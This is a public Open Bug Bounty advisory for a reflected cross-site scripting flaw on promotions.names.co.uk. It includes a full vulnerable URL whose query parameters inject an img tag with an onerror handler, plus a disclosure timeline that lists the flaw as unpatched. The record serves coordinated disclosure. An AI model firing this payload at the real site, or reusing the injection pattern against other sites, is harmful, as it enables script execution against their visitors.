promotions.names.co.uk XSS vulnerability

2016-08-21T18:02:00
ID OBB:176862
Type openbugbounty
Reporter ShivprasadSambhare
Modified 2016-11-13T18:14:00

Description

Vulnerable URL:
http://promotions.names.co.uk/index_uk150.html?PR=%20%22%3E%3Cimg%20src=x%20onerror=prompt(/OPENBUGBOUNTY/)%3E%22&BID;=000&LPAG;=uk150&gclid;=CLn16a2G084CFcQQ%20%22%3E%3Cimg%20src=x%20onerror=prompt(/OPENBUGBOUNTY/)%3E%22aAodaJsCFw&idc;=9592%20%22%3E%3Cimg%20src=x%20onerror=prompt(/OPENBUGBOUNTY/)%3E%22
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 09.10.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 21 August, 2016 18:02 GMT
Generic security notifications sent to website owner| 21 August, 2016 18:04 GMT
Vulnerability details disclosed by researcher| 13 November, 2016 18:14 GMT